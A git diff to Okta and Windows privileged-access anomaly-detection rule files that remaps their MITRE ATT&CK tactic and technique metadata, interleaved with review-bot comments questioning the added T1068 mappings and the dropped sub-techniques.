diff --git a/rules/integrations/pad/privileged_access_ml_okta_high_sum_concurrent_sessions_by_user.toml b/rules/integrations/pad/privileged_access_ml_okta_high_sum_concurrent_sessions_by_user.toml
index 35c3392fc78..225018502ae 100644
--- a/rules/integrations/pad/privileged_access_ml_okta_high_sum_concurrent_sessions_by_user.toml
+++ b/rules/integrations/pad/privileged_access_ml_okta_high_sum_concurrent_sessions_by_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "okta"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/07/02"
 [rule]
 anomaly_threshold = 75
@@ -79,30 +79,29 @@ The Privileged Access Detection integration detects privileged access activity b
 - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**.
 """
 severity = "low"
-tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Defense Evasion", "Tactic: Persistence", "Resources: Investigation Guide"]
+tags = [
+ "Use Case: Privileged Access Detection",
+ "Rule Type: ML",
+ "Rule Type: Machine Learning",
+ "Tactic: Privilege Escalation",
+ "Resources: Investigation Guide",
+]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
+id = "T1068"
+name = "Exploitation for Privilege Escalation"
+reference = "https://attack.mitre.org/techniques/T1068/"
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
+
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/integrations/pad/privileged_access_ml_okta_rare_host_name_by_user.toml b/rules/integrations/pad/privileged_access_ml_okta_rare_host_name_by_user.toml
index d3c4657a878..1387bf22786 100644
--- a/rules/integrations/pad/privileged_access_ml_okta_rare_host_name_by_user.toml
+++ b/rules/integrations/pad/privileged_access_ml_okta_rare_host_name_by_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "okta"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/07/02"
 [rule]
 anomaly_threshold = 75
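Review bot: T1068 Exploitation for Privilege Escalation is added to this rule although an unusually high sum of concurrent Okta sessions for one user is not evidence of a software vulnerability being exploited, which is what T1068 describes; the T1078 Valid Accounts entry that the hunk keeps is the mapping the signal actually supports. The same T1068 block is added in the same way to the okta spike_in_group_application_assignment, spike_in_group_lifecycle, spike_in_group_membership and spike_in_group_privilege rules and to the windows high_count_special_logon, high_count_special_privilege_use, high_count_user_account_management and rare_group_name rules later in this patch, so if it is meant as a generic placeholder for the Privilege Escalation tactic it should be reconsidered once across all of them rather than file by file. A tactic entry without a technique is not what these rules need either, so where no ATT&CK technique genuinely fits, keeping only T1078 under TA0004 is the honest mapping.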
@@ -89,18 +89,14 @@ tags = [
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
-[[rule.threat.technique.subtechnique]]
-id = "T1078.004"
-name = "Cloud Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/integrations/pad/privileged_access_ml_okta_rare_region_name_by_user.toml b/rules/integrations/pad/privileged_access_ml_okta_rare_region_name_by_user.toml
index 54b379a95e8..f79d485a9c4 100644
--- a/rules/integrations/pad/privileged_access_ml_okta_rare_region_name_by_user.toml
+++ b/rules/integrations/pad/privileged_access_ml_okta_rare_region_name_by_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "okta"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/07/02"
 [rule]
 anomaly_threshold = 75
@@ -89,18 +89,14 @@ tags = [
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
-[[rule.threat.technique.subtechnique]]
-id = "T1078.004"
-name = "Cloud Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/integrations/pad/privileged_access_ml_okta_rare_source_ip_by_user.toml b/rules/integrations/pad/privileged_access_ml_okta_rare_source_ip_by_user.toml
index 7783473fcb2..938ae0eef73 100644
--- a/rules/integrations/pad/privileged_access_ml_okta_rare_source_ip_by_user.toml
+++ b/rules/integrations/pad/privileged_access_ml_okta_rare_source_ip_by_user.toml
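Review bot: Both hunks on this line remove the T1078.004 Cloud Accounts sub-technique while keeping the parent T1078, for the okta rare_host_name and rare_region_name rules; Okta is a cloud identity provider, so the sub-technique was the precise mapping and dropping it only makes the rule metadata less specific without changing the tactic. The same removal happens for the okta rare_source_ip rule in the next hunk. If there is a project-wide decision to stop mapping sub-techniques on ML rules it should be stated in the commit description; otherwise the three `[[rule.threat.technique.subtechnique]]` blocks with `id = "T1078.004"` should be kept.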
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "okta"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/07/02"
 [rule]
 anomaly_threshold = 75
@@ -78,22 +78,24 @@ The Privileged Access Detection integration detects privileged access activity b
 - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**.
 """
 severity = "low"
-tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Initial Access", "Resources: Investigation Guide"]
+tags = [
+ "Use Case: Privileged Access Detection",
+ "Rule Type: ML",
+ "Rule Type: Machine Learning",
+ "Tactic: Privilege Escalation",
+ "Resources: Investigation Guide",
+]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
-[[rule.threat.technique.subtechnique]]
-id = "T1078.004"
-name = "Cloud Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_application_assignment_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_application_assignment_changes.toml
index be3e4999263..f84ac248bfd 100644
--- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_application_assignment_changes.toml
+++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_application_assignment_changes.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "okta"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/07/02"
 [rule]
 anomaly_threshold = 75
@@ -78,30 +78,34 @@ The Privileged Access Detection integration detects privileged access activity b
 - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**.
 """
 severity = "low"
-tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"]
+tags = [
+ "Use Case: Privileged Access Detection",
+ "Rule Type: ML",
+ "Rule Type: Machine Learning",
+ "Tactic: Privilege Escalation",
+ "Resources: Investigation Guide",
+]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
+id = "T1068"
+name = "Exploitation for Privilege Escalation"
+reference = "https://attack.mitre.org/techniques/T1068/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_lifecycle_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_lifecycle_changes.toml
index 6d695a94ca5..14c6f23bdb1 100644
--- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_lifecycle_changes.toml
+++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_lifecycle_changes.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "okta"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/07/02"
 [rule]
 anomaly_threshold = 75
@@ -78,30 +78,29 @@ The Privileged Access Detection integration detects privileged access activity b
 - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**.
 """
 severity = "low"
-tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"]
+tags = [
+ "Use Case: Privileged Access Detection",
+ "Rule Type: ML",
+ "Rule Type: Machine Learning",
+ "Tactic: Privilege Escalation",
+ "Resources: Investigation Guide",
+]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
+id = "T1068"
+name = "Exploitation for Privilege Escalation"
+reference = "https://attack.mitre.org/techniques/T1068/"
 [[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_membership_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_membership_changes.toml
index 819783e4e86..abd5652b01f 100644
--- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_membership_changes.toml
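Review bot: The second hunk on this line removes every T1098 Account Manipulation mapping from the group-lifecycle rule and replaces it with T1068 and T1078, but a spike in Okta group lifecycle changes is account and group manipulation by definition, so the rule is left with no technique that describes its own signal. The sibling spike_in_group_application_assignment and spike_in_group_privilege hunks in this patch keep `id = "T1098"` under the new Privilege Escalation tactic, and the same should be done here and in the spike_in_group_membership hunk that follows, by keeping the `[[rule.threat.technique]]` block with `id = "T1098"` alongside T1078 instead of overwriting it.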
+++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_membership_changes.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "okta"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/07/02"
 [rule]
 anomaly_threshold = 75
@@ -78,30 +78,29 @@ The Privileged Access Detection integration detects privileged access activity b
 - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**.
 """
 severity = "low"
-tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"]
+tags = [
+ "Use Case: Privileged Access Detection",
+ "Rule Type: ML",
+ "Rule Type: Machine Learning",
+ "Tactic: Privilege Escalation",
+ "Resources: Investigation Guide",
+]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
+id = "T1068"
+name = "Exploitation for Privilege Escalation"
+reference = "https://attack.mitre.org/techniques/T1068/"
 [[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_privilege_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_privilege_changes.toml
index 7af93c7e7f8..51b64715dc1 100644
--- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_privilege_changes.toml
+++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_privilege_changes.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "okta"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/07/02"
 [rule]
 anomaly_threshold = 75
@@ -78,30 +78,34 @@ The Privileged Access Detection integration detects privileged access activity b
 - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**.
 """
 severity = "low"
-tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"]
+tags = [
+ "Use Case: Privileged Access Detection",
+ "Rule Type: ML",
+ "Rule Type: Machine Learning",
+ "Tactic: Privilege Escalation",
+ "Resources: Investigation Guide",
+]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
+id = "T1068"
+name = "Exploitation for Privilege Escalation"
+reference = "https://attack.mitre.org/techniques/T1068/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_user_lifecycle_management_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_user_lifecycle_management_changes.toml
index 419a525d378..6a80f4a7bd4 100644
--- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_user_lifecycle_management_changes.toml
+++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_user_lifecycle_management_changes.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "okta"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/07/02"
 [rule]
 anomaly_threshold = 75
@@ -77,30 +77,29 @@ The Privileged Access Detection integration detects privileged access activity b
 - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**.
 """
 severity = "low"
-tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"]
+tags = [
+ "Use Case: Privileged Access Detection",
+ "Rule Type: ML",
+ "Rule Type: Machine Learning",
+ "Tactic: Privilege Escalation",
+ "Resources: Investigation Guide",
+]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/integrations/pad/privileged_access_ml_windows_high_count_group_management_events.toml b/rules/integrations/pad/privileged_access_ml_windows_high_count_group_management_events.toml
index 475bbf0e183..bf61284eae9 100644
--- a/rules/integrations/pad/privileged_access_ml_windows_high_count_group_management_events.toml
+++ b/rules/integrations/pad/privileged_access_ml_windows_high_count_group_management_events.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "endpoint", "windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/07/02"
 [rule]
 anomaly_threshold = 75
@@ -80,40 +80,29 @@ The Privileged Access Detection integration detects privileged access activity b
 - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**.
 """
 severity = "low"
-tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"]
+tags = [
+ "Use Case: Privileged Access Detection",
+ "Rule Type: ML",
+ "Rule Type: Machine Learning",
+ "Tactic: Privilege Escalation",
+ "Resources: Investigation Guide",
+]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1098.007"
-name = "Additional Local or Domain Groups"
-reference = "https://attack.mitre.org/techniques/T1098/007/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
-[[rule.threat.technique.subtechnique]]
-id = "T1098.007"
-name = "Additional Local or Domain Groups"
-reference = "https://attack.mitre.org/techniques/T1098/007/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/integrations/pad/privileged_access_ml_windows_high_count_special_logon_events.toml b/rules/integrations/pad/privileged_access_ml_windows_high_count_special_logon_events.toml
index 43ae8f19544..d287e6828b1 100644
--- a/rules/integrations/pad/privileged_access_ml_windows_high_count_special_logon_events.toml
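Review bot: The T1098.007 Additional Local or Domain Groups sub-technique is removed twice in this hunk and not re-added under the surviving Privilege Escalation entry, although a high count of Windows group-management events is exactly the group-membership manipulation that sub-technique names; the parent T1098 that remains is a weaker description of the same signal. Keeping the four `[[rule.threat.technique.subtechnique]]` lines with `id = "T1098.007"` under the retained T1098 block preserves the specificity at no cost to the tactic change. The same sub-technique is dropped from the windows rare_group_name rule at the end of this patch.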
+++ b/rules/integrations/pad/privileged_access_ml_windows_high_count_special_logon_events.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "endpoint", "windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/07/02"
 [rule]
 anomaly_threshold = 75
@@ -87,13 +87,19 @@ tags = [
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1068"
+name = "Exploitation for Privilege Escalation"
+reference = "https://attack.mitre.org/techniques/T1068/"
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
+
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/integrations/pad/privileged_access_ml_windows_high_count_special_privilege_use_events.toml b/rules/integrations/pad/privileged_access_ml_windows_high_count_special_privilege_use_events.toml
index f0865772d82..581372213fe 100644
--- a/rules/integrations/pad/privileged_access_ml_windows_high_count_special_privilege_use_events.toml
+++ b/rules/integrations/pad/privileged_access_ml_windows_high_count_special_privilege_use_events.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "endpoint", "windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/07/02"
 [rule]
 anomaly_threshold = 75
@@ -89,8 +89,19 @@ tags = [
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1068"
+name = "Exploitation for Privilege Escalation"
+reference = "https://attack.mitre.org/techniques/T1068/"
+
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/integrations/pad/privileged_access_ml_windows_high_count_user_account_management_events.toml b/rules/integrations/pad/privileged_access_ml_windows_high_count_user_account_management_events.toml
index d58878658ee..ece76dfc05e 100644
--- a/rules/integrations/pad/privileged_access_ml_windows_high_count_user_account_management_events.toml
+++ b/rules/integrations/pad/privileged_access_ml_windows_high_count_user_account_management_events.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "endpoint", "windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/07/02"
 [rule]
 anomaly_threshold = 75
@@ -79,35 +79,29 @@ The Privileged Access Detection integration detects privileged access activity b
 - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**.
 """
 severity = "low"
-tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"]
+tags = [
+ "Use Case: Privileged Access Detection",
+ "Rule Type: ML",
+ "Rule Type: Machine Learning",
+ "Tactic: Privilege Escalation",
+ "Resources: Investigation Guide",
+]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
+id = "T1068"
+name = "Exploitation for Privilege Escalation"
+reference = "https://attack.mitre.org/techniques/T1068/"
 [[rule.threat.technique]]
-id = "T1136"
-name = "Create Account"
-reference = "https://attack.mitre.org/techniques/T1136/"
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/integrations/pad/privileged_access_ml_windows_rare_group_name_by_user.toml b/rules/integrations/pad/privileged_access_ml_windows_rare_group_name_by_user.toml
index bb3d1645ebc..afb390d2236 100644
--- a/rules/integrations/pad/privileged_access_ml_windows_rare_group_name_by_user.toml
+++ b/rules/integrations/pad/privileged_access_ml_windows_rare_group_name_by_user.toml
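Review bot: After this hunk the user-account-management rule maps to T1068 and T1078 only, having removed both T1098 Account Manipulation and T1136 Create Account, which are the two techniques a high count of Windows user-account-management events actually evidences; neither exploiting a vulnerability nor merely using a valid account describes account creation or modification. Keep at least the `[[rule.threat.technique]]` block with `id = "T1098"` (and ideally T1136) under the retained TA0004 entry, as the sibling user_lifecycle_management hunk in this patch does, rather than replacing them wholesale.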
@@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] anomaly_threshold = 75 
@@ -81,35 +81,41 @@ The Privileged Access Detection integration detects privileged access activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Discovery", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] +tags = [ + "Use Case: Privileged Access Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" 
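Review bot: The tags list now carries only `"Tactic: Privilege Escalation"` while the threat mapping still has a Discovery entry (`T1069` under `TA0007`), so `"Tactic: Discovery"` is missing; either restore `"Tactic: Discovery",` next to the Privilege Escalation tag or drop the Discovery entry. The removed `T1098.007` (Additional Local or Domain Groups) was the technique that literally describes a user being added to a group they are rarely seen in, whereas the replacement `T1068` is not evidenced by group-membership events — I would keep `T1098`/`T1098.007` and drop T1068. Cosmetic only: the new `[rule.threat.tactic]` block for TA0004 runs straight into the next `[[rule.threat]]` with no blank line, unlike the other entries in this file.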
diff --git a/rules/integrations/pad/privileged_access_ml_windows_rare_privilege_assigned_to_user.toml b/rules/integrations/pad/privileged_access_ml_windows_rare_privilege_assigned_to_user.toml index 4a71ea94c33..f7407fd1638 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_rare_privilege_assigned_to_user.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_rare_privilege_assigned_to_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] anomaly_threshold = 75 @@ -89,13 +89,19 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/pad/privileged_access_ml_windows_rare_region_name_by_user.toml b/rules/integrations/pad/privileged_access_ml_windows_rare_region_name_by_user.toml index 4bc54d76a48..c3078e43d19 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_rare_region_name_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_rare_region_name_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] anomaly_threshold = 75 
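Review bot: Adding `T1068` (Exploitation for Privilege Escalation) to this rule is not supported by its signal: a rare privilege assigned to a user is an audit event about privilege assignment, not evidence that a software vulnerability was exploited, and the existing `T1078` (Valid Accounts) already covers the privilege-abuse reading. I would drop the new technique block or replace it with `T1098` (Account Manipulation), which is the closer match and which this patch removes from the sibling PAD rules. The same T1068 block is pasted into three PAD rules here; if it is kept, the justification should appear at least once in the rule description.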
